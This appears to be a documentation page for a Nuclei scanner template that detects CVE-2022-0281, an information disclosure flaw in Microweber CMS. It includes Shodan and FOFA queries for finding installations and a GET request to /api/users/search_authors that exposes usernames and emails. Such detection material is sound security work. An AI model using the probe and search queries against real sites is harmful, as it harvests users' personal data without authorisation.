Microweber Information Disclosure
ID: CVE-2022-0281
Severity: high
Author: pikpikcu
Tags: cve,cve2022,microweber,disclosure,huntr
Description
Section titled “Description”Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11.
YAML Source
Section titled “YAML Source”id: CVE-2022-0281
info: name: Microweber Information Disclosure author: pikpikcu severity: high description: Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11. impact: | Successful exploitation of this vulnerability can lead to the exposure of sensitive data, such as user credentials or database information. remediation: | Apply the latest security patch or update provided by the Microweber CMS vendor to fix the information disclosure vulnerability (CVE-2022-0281). reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-0281 - https://github.com/microweber/microweber/commit/e680e134a4215c979bfd2eaf58336be34c8fc6e6 - https://huntr.dev/bounties/315f5ac6-1b5e-4444-ad8f-802371da3505 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-0281 cwe-id: CWE-200 epss-score: 0.00415 epss-percentile: 0.73978 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microweber product: microweber shodan-query: - http.favicon.hash:780351152 - http.html:"microweber" fofa-query: - body="microweber" - icon_hash=780351152 tags: cve,cve2022,microweber,disclosure,huntr
http: - method: GET path: - "{{BaseURL}}/api/users/search_authors"
matchers-condition: and matchers: - type: word part: body words: - '"username":' - '"email":' - '"display_name":' condition: and
- type: status status: - 200# digest: 4a0a0047304502210093b05c716b62b26297fc41457c2896181514d1c75b669c79753cac414f02752f022047cec52d9392a8d9ff91551190651cf097831284f8381b637d49bdd2aedd0d10:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0281.yaml"